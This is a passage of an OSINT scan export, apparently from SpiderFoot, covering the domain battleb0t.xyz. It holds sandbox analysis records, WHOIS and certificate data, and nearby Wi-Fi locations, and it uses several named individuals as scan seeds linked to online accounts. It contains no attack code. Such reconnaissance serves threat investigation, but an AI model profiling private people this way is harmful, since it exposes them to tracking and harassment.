None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "shoppingfre.js" - Location: [%TEMP%\\2964_812909146\\shoppingfre.js]- [targetUID: 00000000-00002964]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\2964_812909146\\auto_open_controller.js]- [targetUID: 00000000-00002964]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\2964_812909146\\shopping_iframe_driver.js]- [targetUID: 00000000-00002964]\n Dropped file: "product_page.js" - Location: [%TEMP%\\2964_812909146\\product_page.js]- [targetUID: 00000000-00002964]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\2964_812909146\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002964]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\2964_812909146\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002964]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\2964_441367473\\adblock_snippet.js]- [targetUID: 00000000-00002964]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\2964_812909146\\edge_tracking_page_validator.js]- [targetUID: 00000000-00002964]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-43', u'name': u'Writes a PE file header to disc', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 6, u'description': u'"msedge.exe" wrote 8192 bytes starting with PE header signature to file "%TEMP%\\2964_842337331\\_platform_specific\\win_x64\\widevinecdm.dll": 4d5a78000100000004000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000000000000780000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e2400005045000064ff0a00 ...'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': | 185.199.111.153 |
| 2023-05-12 03:03:19 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | kekw.battleb0t.xyz | [{u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-04-27T17:58:42', u'not_before': u'2023-01-27T17:58:43', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0353521f2268d4e4bd04c1ea37aeda35a438', u'entry_timestamp': u'2023-01-27T18:58:43.373', u'id': 8595002735}, {u'not_after': u'2023-04-27T17:58:42', u'not_before': u'2023-01-27T17:58:43', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0353521f2268d4e4bd04c1ea37aeda35a438', u'entry_timestamp': u'2023-01-27T18:58:43.278', u'id': 8512878872}, {u'not_after': u'2023-03-18T21:24:58', u'not_before': u'2022-12-18T21:24:59', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'036227a6dc1628deaea0a47d7ea00281250e', u'entry_timestamp': u'2022-12-18T22:24:59.851', u'id': 8238674246}, {u'not_after': u'2023-03-18T21:24:58', u'not_before': u'2022-12-18T21:24:59', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'036227a6dc1628deaea0a47d7ea00281250e', u'entry_timestamp': u'2022-12-18T22:24:59.092', u'id': 8232262063}] |
| 2023-05-12 03:24:33 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 4 | 0 | None | VXVault Malicious URL List [cdn-185-199-111-154.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-111-154.github.com |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DTLAMN (Net ID: 00:01:9F:20:3C:A0) | 34.0544, -118.244 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:21:5D:E4) | 50.1188, 8.6843 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f605affff189d-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 02:44:03 | Internal SpiderFoot Root event | No | SpiderFoot UI | 12 | 0 | 0 | 0 | None | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:44:15 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | pics.battleb0t.xyz |
| 2023-05-12 03:10:20 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [188.114.97.0/24]
http://www.voipbl.org/update | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TheCs (Net ID: 00:09:0F:BC:AB:26) | 39.0469, -77.4903 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beens Gast (Net ID: 00:01:21:1F:B1:91) | 52.3759, 4.8975 |
| 2023-05-12 03:23:41 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Pillowfort (Category: social)
https://www.pillowfort.social/baptiste.vauthey | baptiste.vauthey |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | iskorpit (Net ID: 00:15:D0:36:48:62) | 40.2024, 29.0398 |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 19 | 0 | 1 | 0 | None | fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:49:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://cytoscape.org/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5168:120:WilError_01"\n "Local\\SM0:2368:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:2368:120:WilError_01"\n "Local\\SM0:2368:120:WilError_01"\n "SM0:2368:304:WilStaging_02"\n "Local\\SM0:5168:304:WilStaging_02"\n "SM0:5168:304:WilStaging_02"\n "SM0:5168:120:WilError_01"\n "Local\\SM0:5168:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5168:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5168:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5168:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "69.16.175.42:443"\n "104.18.11.207:443"\n "142.250.191.46:443"\n "142.250.188.14:443"\n "52.10.229.192:443"\n "192.229.210.155:443"\n "192.229.163.25:443"\n "142.250.189.238:443"\n "142.251.214.142:443"\n "142.250.188.8:443"\n "108.138.246.126:443"\n "142.250.188.13:443"\n "142.251.46.227:443"\n "18.155.202.52:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"abs.twimg.com"\n "cytoscape.org"\n "home.ndexbio.org"\n "syndication.twitter.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"syndication.twitter.com" (Indicator: "twitter")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00005168]\n "f_00024d" has type "gzip compressed data max compression original size modulo 2^32 258173"- [targetUID: N/A]\n "f_000268" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 360x353 components 3"- [targetUID: N/A]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\manifest.json]- [targetUID: 00000000-00005168]\n "0bb730fb-1fbe-4afa-904a-b584b39204fd.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 2253262"- Location: [%TEMP%\\0bb730fb-1fbe-4afa-904a-b584b39204fd.tmp]- [targetUID: 00000000-00005168]\n "3b5c0edd43425875_0" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "PNG image data 380 x 122 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "68e6dbb3-f4d1-41b2-92aa-03d128f088dc.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\68e6dbb3-f4d1-41b2-92aa-03d128f088dc.tmp]- [targetUID: 00000000-00005296]\n "f_000243" has type "PNG image data 2422 x 1838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "f_00023d" has type "PNG image data 380 x 168 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00005296]\n "b227a39674051662_0" has type "data"- [targetUID: N/A]\n "5b1db3ddc4fa4aec_0" has type "data"- [targetUID: N/A]\n "1c5433fc0e218662_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\1c5433fc0e218662_0]- [targetUID: 00000000-00005168]\n "00ed96a6-c8b3-4034-8071-093867526c70.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\00ed96a6-c8b3-4034-8071-093867526c70.tmp]- [targetUID: 00000000-00005168]\n "d0e3a151e37a5784_0" has type "data"- [targetUID: N/A]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003264]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://cytoscape.org/"\n Heuristic match: "abs.twimg.com"\n Pattern match: "https://creativecommons.org/"\n Heuristic match: "cytoscape.org"\n Heuristic match: "home.ndexbio.org"\n Pattern match: "https://cytoscape.org"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "syndication.twitter.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Heuristic match: "ytoscape.org"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.250.191.46"\n "UDP connection to 142.250.188.14"\n "UDP connection to 142.251.214.142"\n "UDP connection to 142.250.188.8"\n "UDP connection to 142.251.46.227"\n "UDP connection to 142.250.189.238"\n "UDP connection to 172.217.12.99"\n "UDP connection to 142.251.32.34"\n "UDP connection to 142.251.32.42"\n "UDP connection to 142.250.188.1"\n "UDP connection to 142.251.46.174"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"adblock_snippet.js" has type "Unknown"- Location: [%TEMP%\\5168_407672804\\adblock_snippet.js]- [targetUID: 00000000-00005168]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45"\n Potential IP "10.34.0.45" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\LICENSE"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n "192.168.241.102"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}], u'threat_level': 0, u'size': None, u'job_id': u'642262aa36c72290dd02ee4c', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_a | 185.199.110.153 |
| 2023-05-12 02:49:38 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'WAV-3178248.html', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\UXTHEME.DLL" at base a87d0000\n "msedge.exe" loaded module "COMBASE.DLL" at base ad600000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base 8fcd0000\n "msedge.exe" loaded module "NTDLL.DLL" at base ade40000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base ad520000\n "msedge.exe" loaded module "SHELL32.DLL" at base ab320000\n "msedge.exe" loaded module "USER32.DLL" at base ac820000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base aa240000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base aa240000\n "msedge.exe" loaded module "ADVAPI32.DLL" at base ad060000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base aa240000\n "msedge.exe" loaded module "KERNEL32" at base ac770000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base aa240000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base aa240000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base aa240000\n "msedge.exe" loaded module "C:\\PROGRAM FILES (X86)\\MICROSOFT\\EDGE\\APPLICATION\\103.0.1264.37\\MSEDGE.DLL" at base 79080000\n "msedge.exe" loaded module "KERNEL32.DLL" at base ac770000'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.30.148:443"\n "185.199.110.153:443"\n "104.17.24.14:443"\n "65.8.158.45:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"\n "O@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3784:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3784:120:WilError_01"\n "Local\\SM0:3784:304:WilStaging_02"\n "Local\\SM0:3784:120:WilError_01"\n 